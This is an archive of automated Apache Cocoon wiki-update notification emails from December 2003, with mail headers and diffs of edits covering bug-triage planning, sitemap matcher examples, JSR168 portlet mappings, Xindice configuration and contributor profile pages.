Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 48158 invoked from network); 4 Dec 2003 08:59:56 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 4 Dec 2003 08:59:56 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB4908p16087 for <[email protected]>; Thu, 4 Dec 2003 10:00:08 +0100 Date: Thu, 4 Dec 2003 10:00:08 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] FirstFridayDecember2003 FirstFriday IvoLimmen CocoonUserGroupHolland Thu Dec 4 10:00:08 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=FirstFridayDecember2003 , version: 13 on Thu Dec 4 08:41:32 2003 by BertrandDelacretaz - * As usual, try to reduce/tidy/comment/commit the Bugzilla entries. + * As usual, try to reduce/tidy/comment/commit the Bugzilla entries (see [HowWeUseBugzilla], includes prepared bugzilla queries). Page: http://wiki.cocoondev.org/Wiki.jsp?page=FirstFriday , version: 19 on Thu Dec 4 08:44:03 2003 by BertrandDelacretaz - Cocooners from all over the world work collectively during the first Friday of each month to fix, close and otherwise improve the health of [bugzilla|http://nagoya.apache.org/bugzilla/index.html] issues (it doesn't mean they don't work on them at other times though ;-) ? ^^^^^^^^^^ ^^^^^^^^ ^^^^^^ ----------- + Cocooners from all over the world work collectively during the first Friday of each month to fix, close and otherwise improve the health of [bugzilla|HowWeUseBugzilla] issues (it doesn't mean they don't work on them at other times though ;-) ? ^ ^^ ^^^^ Page: http://wiki.cocoondev.org/Wiki.jsp?page=IvoLimmen , version: 1 on Thu Dec 4 08:48:10 2003 by IvoLimmen New page created: + I work at Virgil in Amsterdam creating financial reporting applications using Cocoon. + + Reach me at: ivo dot [email protected]. + Page: http://wiki.cocoondev.org/Wiki.jsp?page=CocoonUserGroupHolland , version: 16 on Thu Dec 4 08:46:04 2003 by 161.129.204.104 - * Ivo Limmen, Virgil, Amsterdam + * [Ivo Limmen|IvoLimmen], Virgil, Amsterdam ? + +++++++++++ From [email protected] Thu Dec 04 14:00:15 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 30422 invoked from network); 4 Dec 2003 14:00:15 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 4 Dec 2003 14:00:15 -0000 Received: (qmail 10559 invoked by uid 500); 4 Dec 2003 14:00:04 -0000 Delivered-To: [email protected] Received: (qmail 10500 invoked by uid 500); 4 Dec 2003 14:00:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 10416 invoked from network); 4 Dec 2003 14:00:03 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 4 Dec 2003 14:00:03 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB4E02p16206 for <[email protected]>; Thu, 4 Dec 2003 15:00:03 +0100 Date: Thu, 4 Dec 2003 15:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] Matcher Thu Dec 4 15:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=Matcher , version: 8 on Thu Dec 4 13:21:59 2003 by AndrewSavory - Note: matchers can be nested within one another. ? ^^^^^^^ ^ + Matchers can be nested within one another: ? ^ ^ + {{{<map:match pattern="foo/**"> + <map:match pattern="foo/*.html"> + <map:generate src="/docs/{1}.xml"/> + ... + </map:match> + </map:match>}}} + + Note that the full request URI is passed to nested matchers, so you need {{foo/*.html}} in the example above, rather than {{*.html}}. It may be worth mounting a sub-sitemap for {{foo}} in examples like this. From [email protected] Thu Dec 04 15:00:09 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 73771 invoked from network); 4 Dec 2003 15:00:08 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 4 Dec 2003 15:00:08 -0000 Received: (qmail 78961 invoked by uid 500); 4 Dec 2003 15:00:04 -0000 Delivered-To: [email protected] Received: (qmail 78826 invoked by uid 500); 4 Dec 2003 15:00:03 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 78812 invoked from network); 4 Dec 2003 15:00:03 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 4 Dec 2003 15:00:03 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB4F03p16233 for <[email protected]>; Thu, 4 Dec 2003 16:00:04 +0100 Date: Thu, 4 Dec 2003 16:00:04 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] RecipeXSPSendMailExample WoodyBinding Thu Dec 4 16:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=RecipeXSPSendMailExample , version: 1 on Thu Dec 4 14:34:42 2003 by StavrosKounis New page created: + !Requirements + [http://java.sun.com/products/javabeans/glasgow/jaf.html]\\ + [http://java.sun.com/products/javamail/] + Page: http://wiki.cocoondev.org/Wiki.jsp?page=WoodyBinding , version: 19 on Thu Dec 4 14:28:23 2003 by SylvainWallez - * parent-path - * row-path + * parent-path (same as in wb:repeater) + * row-path (same as in wb:repeater) - ''Child elements:'' any (?) ? ---- + ''Child elements:'' any - Supposedly only works with XML... + Works with XML or with JavaBeans if a JXPath factory is set on the binding context. From [email protected] Thu Dec 04 16:00:10 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 12438 invoked from network); 4 Dec 2003 16:00:10 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 4 Dec 2003 16:00:10 -0000 Received: (qmail 18879 invoked by uid 500); 4 Dec 2003 16:00:05 -0000 Delivered-To: [email protected] Received: (qmail 18753 invoked by uid 500); 4 Dec 2003 16:00:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 18742 invoked from network); 4 Dec 2003 16:00:04 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 4 Dec 2003 16:00:04 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB4G05p16260 for <[email protected]>; Thu, 4 Dec 2003 17:00:05 +0100 Date: Thu, 4 Dec 2003 17:00:05 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] Main CocoonUserGroupSwitzerland FirstFridayDecember2003 JSR168Portlet Thu Dec 4 17:00:05 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=Main , version: 310 on Thu Dec 4 15:35:54 2003 by Vadim + * December 4, 2003 + ** Added draft of [JSR168Portlet] ''-- [Vadim]'' Page: http://wiki.cocoondev.org/Wiki.jsp?page=CocoonUserGroupSwitzerland , version: 45 on Thu Dec 4 15:58:46 2003 by MichaelGerzabek + *[MichaelGerzabek]: 27th, (28th), 29th are ok. Page: http://wiki.cocoondev.org/Wiki.jsp?page=FirstFridayDecember2003 , version: 14 on Thu Dec 4 15:33:54 2003 by JoergHeinicke - * Duplicate namespace declaration in SQLTransformer (repeatedly reported, e.g. [here|http://marc.theaimsgroup.com/?t=106863248500002&r=1&w=2]) + * Duplicate namespace declaration in SQLTransformer (repeatedly reported, e.g. [here|http://marc.theaimsgroup.com/?t=106863248500002&r=1&w=2], [Bug 25203|http://nagoya.apache.org/bugzilla/show_bug.cgi?id=25203]) ? +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Page: http://wiki.cocoondev.org/Wiki.jsp?page=JSR168Portlet , version: 1 on Thu Dec 4 15:33:38 2003 by Vadim New page created: + !Basics + + JSR168 defines API for writing portable (across portal implementations) portlets in Java, and is similar (and related) to the Servlets spec. + + To implement JSR168 Portlet using Cocoon, JSR168 Environment is introduced. + + !Environment + + JSR168 environment for Cocoon maps Portlet primitives onto Cocoon primitives. Most of the + time mapping is obvious: + + | __org.apache.cocoon.environment.portlet__ | __javax.portlet__ | + | PortletRequest | PortletRequest | + | PortletResponse | PortletResponse | + | ActionRequest | ActionRequest | + | ... | ... | + | PortletCookie | PortletPreferences | + + But there are times when it is not so obvious. Let's look at PortletRequest: + + | __org.apache.cocoon.environment.portlet.PortletRequest__ | __javax.portlet.PortletRequest__ | + | headers | properties | + | cookies (only name and value are populated) | preferences | + | header X-Portlet-Mode | portletMode | + | header X-Window-State | windowState | + | pathInfo | parameter cocoon-portlet-path | + | servletPath | ''no analogy; populated by CocoonPortlet'' | + | contentLength | -1 | + | contentType | null | + | protocol | JSR168 | + | remoteAddr | null | + | remoteHost | null | + | method | GET for RenderRequest, POST for ActionRequest | + | pathTranslated | null | + | queryString | "" | + | requestURI | contextPath ''(what should be here?)'' | + | isRequestedSessionIdFromCookie | false | + | isRequestedSessionIdFromURL | true | + + The rest of Request interface methods are mapped 1:1 to corresponding PortletRequest + methods (no surprises). + + !Deployment + + Here we outline deployment of CocoonPortlet in the Pluto Portlet container. You'll need: + * jars: + * portal.xml: + * web.xml: + * sitemap.xmap: + From [email protected] Thu Dec 04 17:00:13 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 45750 invoked from network); 4 Dec 2003 17:00:13 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 4 Dec 2003 17:00:13 -0000 Received: (qmail 37233 invoked by uid 500); 4 Dec 2003 17:00:05 -0000 Delivered-To: [email protected] Received: (qmail 37158 invoked by uid 500); 4 Dec 2003 17:00:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 37075 invoked from network); 4 Dec 2003 17:00:03 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 4 Dec 2003 17:00:03 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB4H05p16287 for <[email protected]>; Thu, 4 Dec 2003 18:00:05 +0100 Date: Thu, 4 Dec 2003 18:00:05 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] CocoonUserGroupBratislava RomanHrivik Recipes BrowserInputModule Thu Dec 4 18:00:05 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=CocoonUserGroupBratislava , version: 2 on Thu Dec 4 17:04:24 2003 by RomanHrivik - * [RomanHrivik] + * [Roman Hrivik | RomanHrivik] Page: http://wiki.cocoondev.org/Wiki.jsp?page=RomanHrivik , version: 2 on Thu Dec 4 17:03:30 2003 by RomanHrivik + !Samples added by me: + + [BrowserInputModule] + [RecipeUploadUsingAction] + + Page: http://wiki.cocoondev.org/Wiki.jsp?page=Recipes , version: 6 on Thu Dec 4 16:58:37 2003 by RomanHrivik + !Browser input module + + *[Browser input module | BrowserInputModule] + Page: http://wiki.cocoondev.org/Wiki.jsp?page=BrowserInputModule , version: 6 on Thu Dec 4 17:01:27 2003 by RomanHrivik - sample browser input module to get a client browser name + sample browser input module to get a client browser name. ? + - designed by [RomanHrivik] + sample created by [RomanHrivik] From [email protected] Thu Dec 04 18:00:12 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 2709 invoked from network); 4 Dec 2003 18:00:12 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 4 Dec 2003 18:00:12 -0000 Received: (qmail 54567 invoked by uid 500); 4 Dec 2003 18:00:04 -0000 Delivered-To: [email protected] Received: (qmail 54546 invoked by uid 500); 4 Dec 2003 18:00:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 54535 invoked from network); 4 Dec 2003 18:00:03 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 4 Dec 2003 18:00:03 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB4I05p16314 for <[email protected]>; Thu, 4 Dec 2003 19:00:06 +0100 Date: Thu, 4 Dec 2003 19:00:06 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] CocoonUserGroupBratislava RomanHrivik RecipeXSPSendMailExample BrowserInputModule Thu Dec 4 19:00:05 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=CocoonUserGroupBratislava , version: 2 on Thu Dec 4 17:04:24 2003 by RomanHrivik - * [RomanHrivik] + * [Roman Hrivik | RomanHrivik] Page: http://wiki.cocoondev.org/Wiki.jsp?page=RomanHrivik , version: 2 on Thu Dec 4 17:03:30 2003 by RomanHrivik + !Samples added by me: + + [BrowserInputModule] + [RecipeUploadUsingAction] + + Page: http://wiki.cocoondev.org/Wiki.jsp?page=RecipeXSPSendMailExample , version: 5 on Thu Dec 4 17:55:56 2003 by StavrosKounis + based on sendmail logicsheet documentation [http://cocoon.apache.org/2.1/userdocs/xsp/sendmail.html], sample created by [StavrosKounis] Page: http://wiki.cocoondev.org/Wiki.jsp?page=BrowserInputModule , version: 6 on Thu Dec 4 17:01:27 2003 by RomanHrivik - sample browser input module to get a client browser name + sample browser input module to get a client browser name. ? + - designed by [RomanHrivik] + sample created by [RomanHrivik] From [email protected] Thu Dec 04 19:00:11 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 30209 invoked from network); 4 Dec 2003 19:00:11 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 4 Dec 2003 19:00:11 -0000 Received: (qmail 90069 invoked by uid 500); 4 Dec 2003 19:00:02 -0000 Delivered-To: [email protected] Received: (qmail 90047 invoked by uid 500); 4 Dec 2003 19:00:02 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 90029 invoked from network); 4 Dec 2003 19:00:01 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 4 Dec 2003 19:00:01 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB4J04p16341 for <[email protected]>; Thu, 4 Dec 2003 20:00:05 +0100 Date: Thu, 4 Dec 2003 20:00:05 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] XMLIndiceCocoon2.1 ArjeCahn Thu Dec 4 20:00:04 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=XMLIndiceCocoon2.1 , version: 6 on Thu Dec 4 18:33:20 2003 by Upayavira + ! Specifying a Database in Embedded mode + To specify a database, you need to set a system property. You can do this by adding: + {{-Dxindice.configuration=<path to your system.xml>}} to the command line when starting your servlet container. + + Then, create a system.xml file, based upon the one you'll find in {{config/system.xml}}. In there you'll find the path to your database {{db}} specified. (Note - I couldn't find one in the XIndice 1.1b1 release, I had to get it from CVS [uv|Upayavira] Page: http://wiki.cocoondev.org/Wiki.jsp?page=ArjeCahn , version: 6 on Thu Dec 4 18:25:10 2003 by ArjeCahn - Cocoon developer and CMS consultant at [Hippo Webworks|http://www.hippo.nl/EN/index.html] + Hello, I'm Arjé Cahn and I am the technical manager of [Hippo Webworks|http://www.hippo.nl/EN/index.html]. + + My main concern is the development of our content management system which has been using Cocoon as a publishing framework for nearly two years now. Right now I'm trying to steer all our efforts towards Slide and Lenya. Besides that, I can say I'm damn proud of all the brilliant ideas my fellow workers put into the sites we build with Cocoon. I sincerely hope that we can donate more and more of our time and code to the Apache Cocoon project. + + WebDAV has been one of the key technologies we use, and I have high expectations for the recent Slide incarnation as a repository for Cocoon. [Unico Hommes] has been preaching Slide in this company for three years now, and I think the timing is right to get going with it. + + I'm not a Java wizard so I'm having a hard time saying sensible things with all the Guru's surrounding Cocoon. Please bare with me.. + + The Hippo Cocoon team is: [Unico Hommes], [Jeroen Reijn], [Johan Stuyts], [Arthur Bogaart], [Rogier Peters], [Berend Snijder] and myself. + + I'm trying to get the [Cocoon User Group Holland] running a little bit. If you're interested in Cocoon and located in or near The Netherlands, feel free to join us and meet informally to share ideas and a some drinks. From [email protected] Thu Dec 04 20:00:12 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 59289 invoked from network); 4 Dec 2003 20:00:11 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 4 Dec 2003 20:00:11 -0000 Received: (qmail 7986 invoked by uid 500); 4 Dec 2003 20:00:00 -0000 Delivered-To: [email protected] Received: (qmail 7957 invoked by uid 500); 4 Dec 2003 20:00:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 7892 invoked from network); 4 Dec 2003 19:59:59 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 4 Dec 2003 19:59:59 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB4K03p16368 for <[email protected]>; Thu, 4 Dec 2003 21:00:03 +0100 Date: Thu, 4 Dec 2003 21:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] WebDAVHTMLArea Thu Dec 4 21:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=WebDAVHTMLArea , version: 7 on Thu Dec 4 19:59:26 2003 by 161.129.204.104 From [email protected] Fri Dec 05 00:00:13 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 97098 invoked from network); 5 Dec 2003 00:00:13 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 5 Dec 2003 00:00:13 -0000 Received: (qmail 41214 invoked by uid 500); 4 Dec 2003 23:59:58 -0000 Delivered-To: [email protected] Received: (qmail 41187 invoked by uid 500); 4 Dec 2003 23:59:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 41175 invoked from network); 4 Dec 2003 23:59:57 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 4 Dec 2003 23:59:57 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB5003p16530 for <[email protected]>; Fri, 5 Dec 2003 01:00:03 +0100 Date: Fri, 5 Dec 2003 01:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] ArjeCahn Fri Dec 5 01:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=ArjeCahn , version: 7 on Thu Dec 4 23:12:14 2003 by DavidCrossley - I'm not a Java wizard so I'm having a hard time saying sensible things with all the Guru's surrounding Cocoon. Please bare with me.. ? - - + I'm not a Java wizard so I'm having a hard time saying sensible things with all the Guru's surrounding Cocoon. Please bear with me. ? + From [email protected] Fri Dec 05 09:00:25 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 53039 invoked from network); 5 Dec 2003 09:00:25 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 5 Dec 2003 09:00:25 -0000 Received: (qmail 32588 invoked by uid 500); 5 Dec 2003 09:00:00 -0000 Delivered-To: [email protected] Received: (qmail 32567 invoked by uid 500); 5 Dec 2003 09:00:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 32554 invoked from network); 5 Dec 2003 08:59:59 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 5 Dec 2003 08:59:59 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB5909p17096 for <[email protected]>; Fri, 5 Dec 2003 10:00:11 +0100 Date: Fri, 5 Dec 2003 10:00:11 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] HowWeUseBugzilla FirstFridayDecember2003 David Fri Dec 5 10:00:09 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=HowWeUseBugzilla , version: 12 on Fri Dec 5 08:32:40 2003 by DavidCrossley - Here are a few __standard__ queries for every day use: ? - + Here are a few __standard__ queries for everyday use: - *[all open Cocoon2 bugs|http://nagoya.apache.org/bugzilla/buglist.cgi?bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&bug_severity=Blocker&bug_severity=Critical&bug_severity=Major&bug_severity=Normal&bug_severity=Minor&email1=&emailtype1=substring&emailassigned_to1=1&email2=&emailtype2=substring&emailreporter2=1&bugidtype=include&bug_id=&changedin=&votes=&chfieldfrom=&chfieldto=Now&chfieldvalue=&product=Cocoon+2&short_desc=&short_desc_type=allwordssubstr&long_desc=&long_desc_type=allwordssubstr&bug_file_loc=&bug_file_loc_type=allwordssubstr&keywords=&keywords_type=anywords&field0-0-0=short_desc&type0-0-0=notsubstring&value0-0-0=%5BPatch%5D&field0-0-1=noop&type0-0-1=noop&value0-0-1=&cmdtype=doit&newqueryname=&order=Reuse+same+sort+as+last+time] + *[all open Cocoon2 bugs|http://nagoya.apache.org/bugzilla/buglist.cgi?bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&bug_severity=Blocker&bug_severity=Critical&bug_severity=Major&bug_severity=Normal&bug_severity=Minor&email1=&emailtype1=substring&emailassigned_to1=1&email2=&emailtype2=substring&emailreporter2=1&bugidtype=include&bug_id=&changedin=&votes=&chfieldfrom=&chfieldto=Now&chfieldvalue=&product=Cocoon+2&short_desc=&short_desc_type=allwordssubstr&long_desc=&long_desc_type=allwordssubstr&bug_file_loc=&bug_file_loc_type=allwordssubstr&keywords=&keywords_type=anywords&field0-0-0=short_desc&type0-0-0=notsubstring&value0-0-0=%5BPatch%5D&field0-0-1=noop&type0-0-1=noop&value0-0-1=&cmdtype=doit&newqueryname=&order=Reuse+same+sort+as+last+time] (DC: Note that [this query|http://nagoya.apache.org/bugzilla/buglist.cgi?bug_status=UNCONFIRMED&bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&email1=&emailtype1=substring&emailassigned_to1=1&email2=&emailtype2=substri! ng&emailreporter2=1&bugidtype=include&bug_id=&changedin=&votes=&chfieldfrom=&chfieldto=Now&chfieldvalue=&product=Cocoon+2&short_desc=&short_desc_type=allwordssubstr&long_desc=&long_desc_type=allwordssubstr&bug_file_loc=&bug_file_loc_type=allwordssubstr&keywords=&keywords_type=anywords&field0-0-0=noop&type0-0-0=noop&value0-0-0=&cmdtype=doit&namedcmd=CocoonOpenIssues&newqueryname=&order=Reuse+same+sort+as+last+time] from the FirstFriday front page gives 93 bugs instead of the 58) Page: http://wiki.cocoondev.org/Wiki.jsp?page=FirstFridayDecember2003 , version: 15 on Fri Dec 5 08:27:18 2003 by DavidCrossley - * + * In the beginning there were 93 Bugs, including 22 Patches. Page: http://wiki.cocoondev.org/Wiki.jsp?page=David , version: 2 on Fri Dec 5 09:03:02 2003 by 161.129.204.104 - http://www.searchportal1.com/home-based-internet-business-opportunity.html + [http://www.searchportal1.com/home-based-internet-business-opportunity.html] ? + + - http://www.searchportal1.com/home-building.html + [http://www.searchportal1.com/home-building.html] ? + + From [email protected] Fri Dec 05 10:00:17 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 83566 invoked from network); 5 Dec 2003 10:00:16 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 5 Dec 2003 10:00:16 -0000 Received: (qmail 22719 invoked by uid 500); 5 Dec 2003 09:59:51 -0000 Delivered-To: [email protected] Received: (qmail 22581 invoked by uid 500); 5 Dec 2003 09:59:50 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 22570 invoked from network); 5 Dec 2003 09:59:49 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 5 Dec 2003 09:59:49 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB5A02p17123 for <[email protected]>; Fri, 5 Dec 2003 11:00:02 +0100 Date: Fri, 5 Dec 2003 11:00:02 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] David Fri Dec 5 11:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=David , version: 2 on Fri Dec 5 09:03:02 2003 by 161.129.204.104 - http://www.searchportal1.com/home-based-internet-business-opportunity.html + [http://www.searchportal1.com/home-based-internet-business-opportunity.html] ? + + - http://www.searchportal1.com/home-building.html + [http://www.searchportal1.com/home-building.html] ? + + From [email protected] Fri Dec 05 11:00:21 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 6379 invoked from network); 5 Dec 2003 11:00:20 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 5 Dec 2003 11:00:20 -0000 Received: (qmail 88181 invoked by uid 500); 5 Dec 2003 10:59:53 -0000 Delivered-To: [email protected] Received: (qmail 88159 invoked by uid 500); 5 Dec 2003 10:59:52 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 88097 invoked from network); 5 Dec 2003 10:59:51 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 5 Dec 2003 10:59:51 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hB5B04p17158 for <[email protected]>; Fri, 5 Dec 2003 12:00:04 +0100 Date: Fri, 5 Dec 2003 12:00:04 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] 